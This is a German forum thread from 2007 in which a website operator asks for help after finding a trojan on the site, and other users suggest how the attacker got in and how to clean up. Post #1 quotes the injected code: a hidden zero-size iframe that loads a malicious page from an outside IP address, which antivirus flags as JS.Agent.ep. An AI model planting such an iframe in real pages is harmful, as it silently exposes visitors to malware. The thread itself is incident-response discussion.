#1 23. Juni 2007 Hey, Ich habe soeben einen Trojaner auf meiner Website entdeckt. Ich hab die index schon gesäubert, aber ich habe den Verdacht dass er Zugriff auf die DB hat. Man kann nämlich in unserem ACP die index über die Datenbank ändern. hier mal n Auszug aus dem public-quelltext: Code: Wir sind zurück! Weil der alte Server n bisschen gezickt hat hat es ein bisschen länger gedauert als geplant... Zum Glück hat uns exec mit dem wir das Board leiten ein bisschen Space zur verfügung gestellt. Domain gleich inklusive.Jetzt kann es wie gewohnt mit guten Upps und guter Launer weitergehen. Ein neuer Header ist schon in Planung und wir hoffen ihr habt spass hier :)<br></br> MFG Enforcer&Naitsgang </div></div> <div class="spacer"></div> [B][COLOR="Red"]<iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>[/COLOR][/B] </td> <td id="right"> <div align="right"> <div class="box"> <div class="box_a"> </div> Wie man am fettgedruckten sehen kann wird der Code ausgeführt ohne ihn zu sehen. Kann es sein dass er den phpmyadmin gehackt hat und dann das Teil da gepostet hat??? Jede antwort ne BW! MFG naitsgang + Multi-Zitat Zitieren
#2 23. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? Um genauer zu sein Kaspersky meldet den Trojaner: JS.Agent.ep und der Code den naitsgang gepostet hat war/is 2 mal in der index.php drin!! Die Seite wird also im iframe geladen das man es gar nicht merkt nur halt dadruch das der Av ansprigt und die Seite blockt! Beim Whois des Servers mit dem Trojaner kam heraus: IP Location: Panama Panama Rbusiness Network Blacklist Status: Currently Listed Code: Whois Record inetnum: 81.95.144.0 - 81.95.147.255 netname: RBNET descr: RBusiness Network admin-c: RNR4-RIPE tech-c: RNR4-RIPE mnt-by: RBN-MNT status: ASSIGNED PA country: PA remarks: INFRA-AW source: RIPE # Filtered role: RBusiness Network Registry address: RBusiness Network address: The Century Tower Building address: Ricardo J. Alfari Avenue address: Panama City address: Republic of Panama phone: +1 401 369 8152 remarks: Points of contact for RBusiness Network Operations remarks: ------------------------------------------------------ remarks: Routing and peering issues: Whois Privacy and Spam Prevention by DomainTools.com remarks: SPAM and Network security issues: Whois Privacy and Spam Prevention by DomainTools.com remarks: Customer support: Whois Privacy and Spam Prevention by DomainTools.com remarks: General information: Whois Privacy and Spam Prevention by DomainTools.com remarks: ------------------------------------------------------ e-mail: Whois Privacy and Spam Prevention by DomainTools.com admin-c: JK4668-RIPE tech-c: JI424-RIPE nic-hdl: RNR4-RIPE mnt-by: RBN-MNT source: RIPE # Filtered route: 81.95.144.0/22 descr: RBNetwork origin: AS40989 mnt-by: RBN-MNT source: RIPE # Filtered So jetzt können mal die wo Ahnung haben uns helfen^^! + Multi-Zitat Zitieren
#3 23. Juni 2007 Zuletzt von einem Moderator bearbeitet: 15. April 2017 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? erinnert mich stark an das: Groß angelegter Angriff auf Web-Anwender im Gange - RR:Board + Multi-Zitat Zitieren
#4 23. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? Meinste das hat was damit zu tun??? Und wie krieg ich das von der Site runter??? Wenns nur ich wäre dann wärs mir ladde aber so werden auch die User gefährdet... Wie is das da eig. drauf gekommen??? MFG naitsgang + Multi-Zitat Zitieren
#5 23. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? Wie sollen wir euch sagen, wie jemand Fremdcode auf eurer Seite einschleust? Wie sollen wir euch sagen, wie ihr den Fremdcode von eurer Seite entfernt? Es freut mich uebrigens, dass du gelernt hast, ganze Saetze zu schreiben. + Multi-Zitat Zitieren
#6 23. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? hm denke mal das ding ist so draufgekommen: er hat deinen verschlüsselten hash geknackt (mit nem prog) und sich dann zutritt zum acp verschafft.... dann hat er das ding vieleicht durch nen exploit reingekriegt.... so würd ich es mir vorstellen.... (kann aber auch völlig falsch liegen) + Multi-Zitat Zitieren
#7 23. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? Wie will der an meinen Hash kommen??? Der Code is non-public und selbstgecodet. @dude: Ich hab nur darauf gewartet dass du nen Post von mir liest wo ich mal normal schreibe und nicht alle 4 Wörter unterbreche ^^ Aber das mit dem Hash wird ja nicht so leicht gehen, weil der ja auch nicht public ist. Deswegen gibts ja auch z.b. Wbb exploits oder?? MFG naitsgang + Multi-Zitat Zitieren
#8 23. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? Schwachsinn. Was fuer ein cmd? Nicht zufaellig Start -> Ausfuehren -> cmd? Wie willst du damit an einen Hash kommen. Normalerweise fuehrst du damit ein Exploit aus, weil man ueber den Cmd direkt die Parameter mit angeben kann aber der Cmd selbst macht nichts... Weiterhin ist das Script selbst gecodet und bei einem selbstgecodeten Closed-Source Projekt ein Exploit zu finden ist ziemlich schwer und wuerde sich nur fuer einen Trojaner nicht lohnen. Also gilt weiterhin: erst informieren, dann reden. + Multi-Zitat Zitieren
#9 24. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? es gibt zwei möglichkeiten: a) euer hacker hat zugang zur datenbank und ihr speichert alle html sachen da drinnen b) euer hacker hat zugang zum server und editiert da die phpfiles ursachen: du, oder ein anderer mit zugang zum server haben sich vom hacker einen trojaner eingefangen beheben des probs: trojaner löschen und server/pma-passwort ändern + Multi-Zitat Zitieren
#10 24. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? Es ist natürlich schwierig die ganze Sache zu beurteielen, da ich weder eure Seite kenne noch euen Code... Aber gibt es irgendwo Formulare/andere Eingabemöglichkeiten wo die User Daten angeben können, die später in die Datenbank wandern? (Es würde auch dazu zählen wenn das Script zum Beispiel eine Zahl ausrechnet die dann per GET oder POST übergeben wird und später in die DB geschrieben wird...) Wenn ja, wie werden diese Daten vor der Eingabe überprüft? Wenn die Eingabeprüfung nur einen kleinen Mangel aufweißt ist es für geübte Programmierer ein leichtes eine SQL-Injection zu implizieren. Folgen: Verändern der Daten in der DB / Datenbankübernahme / Serverübernahme Lösung: Komplette Seite sofort offline nehmen. Alle Kennwörter ändern. Kompletten Server und komplette DB auf Backdoors durchkämmen. Code überarbeiten und jede Usereingabe sauber maskieren. Siehe dazu auch: SQL-Injektion in der Wikipedia + Multi-Zitat Zitieren
#11 24. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? Weil unsere Site von Useruploads lebt ist es dann wahrscheinlich dass das durch die upp.php verursacht wurde. Wer mal schauen will kann die Datei per PN bekommen. Wie schaff ichs dann dass das ding draußen ist??? alles auf die Platte laden und durchsuchen? MFG naitsgang //edit: wird alles escaped. + Multi-Zitat Zitieren
#12 24. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? Sers, also am besten Serverkomplett säubern. Backup mit vorsicht behandeln er könnte eine shell drauf haben, die du dann mitkopierst und dann war die arbeit umsonst. mfg rushzero + Multi-Zitat Zitieren
#13 24. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? Bist du mal über deine Seite mit nem Security Scanner drüber gegangen? Kann ja sein das die Seite ganz einfache Fehler beinhaltet. Acunetix würde mir da jetzt spontan einfallen. + Multi-Zitat Zitieren
#14 24. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? Mal ein interessantes Update. Ich hatte das Script noch nebenbei auf einem anderen Non-Public-Server laufen. Da hat sich das Script auch infiziert. Die auffälligkeiten sind dass ich dort die selbe shoutbox benutzt habe und den selben counter und die shoutboxen sind auf beiden Seiten plötzlich weg. Hat sich der Shoutbox-Betreiber etwa infiziert?? MFG naitsgang + Multi-Zitat Zitieren
#15 24. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? könnte ja normalerweise nicht. Da sich die Infektion ja nicht remote auf dich übertragen kann. Es sei den der Betreiber hat Source (.php dateien) angeboten die du auf deinem Server hattest und da is dann ein Exploit drin. Denn wenn du nur per include die Datei einbindest sollte es eigentlich nicht gehen. + Multi-Zitat Zitieren
#16 25. Juni 2007 AW: Trojaner per iframe. Hacker hat Zugriff auf datenbank? Also das ganze läuft so ab: Du bindest da den Shoutboxcode via iframe auf deine Seite ein und dann kannste die shoubox benutzen. Aber ich glaube dass vllt was mit dem Shoutbox-anbieter nicht stimmt, weil bei beiden seiten (auch auf dem unbekannten space) die gleiche shoutbox verwendet wurde, die aus dem Code entfernt war und der "schadcode" drin war. Kann das was damit zu tun haben?? MFG naitsgang + Multi-Zitat Zitieren